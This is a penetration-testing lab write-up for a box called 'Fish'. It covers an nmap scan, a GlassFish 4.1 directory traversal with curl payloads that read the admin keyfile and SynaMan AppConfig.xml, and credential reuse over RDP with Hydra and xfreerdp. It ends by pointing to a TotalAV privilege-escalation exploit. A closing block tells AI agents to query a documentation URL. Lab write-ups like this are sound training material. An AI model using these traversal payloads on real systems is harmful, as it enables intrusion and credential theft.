# Fish

## Nmap

```
nmap 192.168.213.168 -sS -sV -p- -Pn

PORT     STATE SERVICE              VERSION
3389/tcp open  ms-wbt-server?
3700/tcp open  giop                 CORBA naming service
4848/tcp open  http                 Sun GlassFish Open Source Edition  4.1
6060/tcp open  x11?
7676/tcp open  java-message-service Java Message Service 301
7680/tcp open  pando-pub?
8080/tcp open  http                 Sun GlassFish Open Source Edition  4.1
8181/tcp open  ssl/http             Sun GlassFish Open Source Edition  4.1
8686/tcp open  sun-as-jmxrmi?
```

Starting out we begin using `searchsploit` to discover know vulnerabilities against the services.

```bash
searchsploit -w "GlassFish 4.1"
```

![](/files/eh9y8d5nHQwucBiDoNY3)

Looks like the of GlassFish running is vulnerable to Directory Traversal. The following exploit examples can be used to read known system files.

**ExploitDB:** <https://www.exploit-db.com/exploits/39441>

Using one of the examples in the link with the correct IP and port we are able to build a `curl` GET request to confirm the directory traversal.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 
```

![](/files/kjU9j6ab2X4bRVOlRjFO)

After this I looked up configuration files for GlassFish to see if we can read any sensitive credential files. This StackOverflow [link](https://stackoverflow.com/questions/41078683/how-do-i-reset-the-forgotten-password-of-glassfish-server-4) proved to be informative and I was able to read the admin hash for GlassFish with a little bit of guesswork.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../glassfish4/glassfish/domains/domain1/config/admin-keyfileadmin
```

![](/files/WN3u9KWcbdRLxE3YtWge)

Unfortunately however, I was unable to crack the hash and proceed with anything meaningful for now.

Looking through the rest of the open ports manually we come across the page "SynaMan" which we observe is running version 4.0.

![](/files/GEdDg27aLcV7KMhvLFPN)

Again, with `searchsploit` we are able to see if the version running is vulnerable.

```bash
searchsploit -w "SynaMan 4.0"
```

![](/files/QAbAJMsokMnUWWsMfpwW)

The `SMTP` disclosure is interesting to us:

**ExploitDB:** <https://www.exploit-db.com/exploits/45387>

![](/files/uInHKADNRT8hucFFi34C)

We see from the description that as we already have a directory traversal exploit on the system we can likely read the desired AppConfig.xml

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../SynaMan/config/AppConfig.xml   
```

![](/files/0Z7Q09A34fY8sMTvG7HW)

From the output we are able to tie together the following credentials:

```
arthur:KingOfAtlantis
```

Being as `RDP` is open a quick check with `Hydra` confirms the credentials are valid.

```bash
hydra -l "arthur" -p "KingOfAtlantis" rdp://<IP> 
```

![](/files/cGra9NtjLQARVYNNwBbR)

We can then connect via `RDP` to the target system.

```bash
xfreerdp /u:"arthur" /p:"KingOfAtlantis" +clipboard /v:<IP>
```

![](/files/RHOgcSC7R1QJb0Yew97n)

We see on the desktop a shortcut for the AV application `TotalAV`. Checking `appwiz.cpl` we see that the installed version is *4.14.31*.

![](/files/9Pbvv3OfZ3brxe75A8q4)

`searchsploit` again shows a vulnerability with the installed version.

```bash
searchsploit -w "TotalAV 4.14.31"
```

![](/files/GAEJQ27JeSXv7gowoG03)

This version of `TotalAV` appears to be vulnerable to Privilege Escalation.

**ExploitDB:** <https://www.exploit-db.com/exploits/47897>

**Youtube:** <https://www.youtube.com/watch?v=88qeaLq98Gc>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/to-do/fish.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.